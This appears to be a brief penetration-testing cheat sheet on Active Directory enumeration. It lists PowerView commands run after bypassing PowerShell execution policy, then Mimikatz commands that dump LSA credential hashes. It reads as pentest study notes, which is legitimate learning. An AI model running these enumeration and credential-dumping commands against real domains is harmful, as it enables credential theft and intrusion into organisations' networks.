Active Directory

PowerView

Import module

powershell -ep bypass
[PS] . .\PowerView.ps1

The Domain Users

Get-NetUser | select cn

# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof

The Domain Groups

Get-NetGroup -GroupName *admin*

The Shared Folder

Invoke-SharedFinder

Note: Default shared folder:

ADMIN$
C$
IPC$
NETLOGON
SYSVOL

Net Computer

Get-NetComputer -FullData
Get-NetComputer -FullData |select operatingsystem

Mimikatz

note: must run as administrator

mimikats.exe

privilege::debug
lsadump::lsa /patch
PreviousPost ExploitNextPivoting

Last updated